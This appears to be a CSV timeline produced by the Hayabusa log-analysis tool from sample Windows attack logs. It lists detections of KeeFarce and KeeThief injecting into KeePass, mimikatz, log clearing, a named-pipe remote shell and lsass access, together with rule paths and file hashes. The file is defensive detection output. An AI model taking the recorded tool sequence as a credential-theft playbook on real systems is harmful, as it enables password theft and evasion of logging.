2019-04-28 03:47:00.046 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1036,technique_name=Masquerading | Cmd: KeeFarce.exe | Process: C:\Users\Public\KeeFarce.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0xffa8 | PID: 1288 | PGUID: 365ABB72-A3A4-5CC4-0000-001084960C00 | Hash: SHA1=C622268A9305BA27C78ECB5FFCC1D43B019847B5,MD5=07D86CD24E11C1B8F0C2F2029F9D3466,SHA256=F0D5C8E6DF82A7B026F4F0412F8EDE11A053185675D965215B1FFBBC52326516,IMPHASH=D94F14D149DD5809F1B4D1C38A1B4E40",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx
2019-04-28 03:47:00.046 +09:00,IEWIN7,1,high,Evas,Execution from Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx
2019-04-28 03:47:00.062 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Users\Public\KeeFarce.exe | Tgt Process: C:\Program Files\KeePass Password Safe 2\KeePass.exe | Src PID: 1288 | Src PGUID: 365ABB72-A3A4-5CC4-0000-001084960C00 | Tgt PID: 2364 | Tgt PGUID: 365ABB72-A201-5CC4-0000-00104F500800,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx
2019-04-28 03:47:00.062 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"creddump - keefarce HKTL | Image: C:\Users\Public\BootstrapDLL.dll | Process: C:\Program Files\KeePass Password Safe 2\KeePass.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 2364 | PGUID: 365ABB72-A201-5CC4-0000-00104F500800 | Hash: SHA1=B1230EC24647B3A6A21C2168134917642AE0F44A,MD5=A7683D7DC8C31E7162816D109C98D090,SHA256=92DDE9160B7A26FACD379166898E0A149F7EAD4B9D040AC974C4AFE6B4BD09B5,IMPHASH=E70B5F29E0EFB3558160EFC6DD598747",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx
2019-04-28 03:47:00.062 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"creddump - keefarce HKTL | Image: C:\Users\Public\BootstrapDLL.dll | Process: C:\Users\Public\KeeFarce.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1288 | PGUID: 365ABB72-A3A4-5CC4-0000-001084960C00 | Hash: SHA1=B1230EC24647B3A6A21C2168134917642AE0F44A,MD5=A7683D7DC8C31E7162816D109C98D090,SHA256=92DDE9160B7A26FACD379166898E0A149F7EAD4B9D040AC974C4AFE6B4BD09B5,IMPHASH=E70B5F29E0EFB3558160EFC6DD598747",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx
2019-04-28 03:47:00.124 +09:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\Public\KeeFarce.exe | PID: 1288 | PGUID: 365ABB72-A3A4-5CC4-0000-001084960C00,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx
2019-04-28 03:55:04.710 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Program Files\KeePass Password Safe 2\KeePass.exe | Src PID: 2856 | Src PGUID: 365ABB72-A512-5CC4-0000-0010C05E1B00 | Tgt PID: 2364 | Tgt PGUID: 365ABB72-A201-5CC4-0000-00104F500800,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx
2019-04-28 03:55:04.710 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx
2019-04-28 03:55:04.710 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx
2019-04-28 03:55:04.980 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Program Files\KeePass Password Safe 2\KeePass.exe | Src PID: 2856 | Src PGUID: 365ABB72-A512-5CC4-0000-0010C05E1B00 | Tgt PID: 2364 | Tgt PGUID: 365ABB72-A201-5CC4-0000-00104F500800,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx
2019-04-28 03:55:04.980 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx
2019-04-28 03:55:04.980 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx
2019-04-28 04:27:55.274 +09:00,IEWIN7,1102,high,Evas,Security Log Cleared,User: IEUser,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_chrome_firefox_opera_4663.evtx
2019-04-28 06:04:25.733 +09:00,DESKTOP-JR78RLP,104,high,Evas,System Log File Cleared,User: jwrig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/disablestop-eventlog.evtx
2019-04-28 06:04:32.373 +09:00,DESKTOP-JR78RLP,7040,medium,Evas,Event Log Service Startup Type Changed To Disabled,Old Setting: auto start | New Setting: disabled,../hayabusa-rules/hayabusa/default/alerts/System/7040_EventLogServiceStartupDisabled.yml,../hayabusa-sample-evtx/DeepBlueCLI/disablestop-eventlog.evtx
2019-04-29 01:29:42.988 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Users\IEUser\Desktop\Win32\mimikatz.exe | Tgt Process: C:\Windows\system32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x800 | Src PID: 860 | Src PGUID: 365ABB72-D3C2-5CC5-0000-0010D9790500 | Tgt PID: 748 | Tgt PGUID: 365ABB72-D3E8-5CC5-0000-0010E7D30500,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/process_suspend_sysmon_10_ga_800.evtx
2019-04-29 01:29:42.988 +09:00,IEWIN7,10,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/process_suspend_sysmon_10_ga_800.evtx
2019-04-30 05:59:14.447 +09:00,IEWIN7,18,info,,Pipe Connected,\46a676ab7f179e511e30dd2dc41bd388 | Process: System | PID: 4 | PGUID: 365ABB72-D9C4-5CC7-0000-0010EA030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
2019-04-30 05:59:14.447 +09:00,IEWIN7,18,critical,Evas | PrivEsc,Malicious Named Pipe,,../hayabusa-rules/sigma/pipe_created/sysmon_mal_namedpipes.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
2019-04-30 05:59:15.575 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.18:445 (IEWIN7) | Dst: 10.0.2.17:63025 (NLLT106876) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-D9C4-5CC7-0000-0010EA030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
2019-04-30 05:59:21.539 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -s -NoLogo -NoProfile | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x10896 | PID: 3376 | PGUID: 365ABB72-65A9-5CC7-0000-00104E5C2400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
2019-04-30 05:59:21.539 +09:00,IEWIN7,10,low,,Process Access,Src Process: | Tgt Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3940 | Src PGUID: 365ABB72-6231-5CC7-0000-00104CF71800 | Tgt PID: 3376 | Tgt PGUID: 
365ABB72-65A9-5CC7-0000-00104E5C2400,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx 2019-04-30 05:59:21.539 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx 2019-04-30 05:59:21.539 +09:00,IEWIN7,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx 2019-04-30 05:59:22.144 +09:00,IEWIN7,10,low,,Process Access,Src Process: io\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\whoami.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3376 | Src PGUID: 365ABB72-65A9-5CC7-0000-00104E5C2400 | Tgt PID: 2116 | Tgt PGUID: 365ABB72-65AA-5CC7-0000-00104D882400,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx 2019-04-30 05:59:22.144 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\whoami.exe"" /all | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -s -NoLogo -NoProfile | LID: 0x10896 | PID: 2116 | PGUID: 365ABB72-65AA-5CC7-0000-00104D882400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx 2019-04-30 05:59:22.144 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module 
Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx 2019-04-30 05:59:22.144 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx 2019-04-30 05:59:22.144 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx 2019-04-30 05:59:55.472 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\System32\slui.exe -Embedding | Process: C:\Windows\System32\slui.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x10896 | PID: 2244 | PGUID: 365ABB72-65CB-5CC7-0000-001002202600,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx 2019-04-30 16:22:56.571 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Users\IEUser\AppData\Local\Programs\Opera\launcher.exe | Tgt Process: C:\Users\IEUser\AppData\Local\Temp\opera autoupdate\installer.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3712 | Src PGUID: 365ABB72-F7D0-5CC7-0000-0010D0220E00 | Tgt PID: 2784 | Tgt PGUID: 365ABB72-F7D0-5CC7-0000-0010CB280E00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:22:56.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Users\IEUser\AppData\Local\Programs\Opera\launcher.exe | Tgt Process: 
C:\Users\IEUser\AppData\Local\Programs\Opera\60.0.3255.70\opera_autoupdate.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3712 | Src PGUID: 365ABB72-F7D0-5CC7-0000-0010D0220E00 | Tgt PID: 3624 | Tgt PGUID: 365ABB72-F7D0-5CC7-0000-0010DF2F0E00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:22:57.149 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Users\IEUser\AppData\Local\Programs\Opera\60.0.3255.70\opera_autoupdate.exe | Tgt Process: C:\Users\IEUser\AppData\Local\Programs\Opera\60.0.3255.70\opera_autoupdate.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3624 | Src PGUID: 365ABB72-F7D0-5CC7-0000-0010DF2F0E00 | Tgt PID: 3504 | Tgt PGUID: 365ABB72-F7D1-5CC7-0000-0010AF380E00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.883 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\smss.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 264 | Tgt PGUID: 365ABB72-F69F-5CC7-0000-0010132B0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.883 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: 
C:\Windows\system32\csrss.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 336 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-001033480000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\wininit.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 384 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-0010A74B0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\csrss.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 392 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-00103F4C0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\winlogon.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 440 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-001043520000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | 
Tgt Process: C:\Windows\system32\services.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 468 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-001004550000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 492 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-001072590000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\lsm.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 500 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-0010A3590000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 616 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-0010BB700000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: 
D:\m.exe | Tgt Process: C:\Windows\System32\VBoxService.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 676 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-0010E7AC0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 740 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-00101AB00000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 804 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-00105FB40000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 872 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-001015C00000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process 
Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 908 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-0010A7C40000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.899 +09:00,IEWIN7,10,high,CredAccess,Credentials Dumping Tools Accessing LSASS Memory,,../hayabusa-rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.899 +09:00,IEWIN7,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,../hayabusa-rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious 
In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 
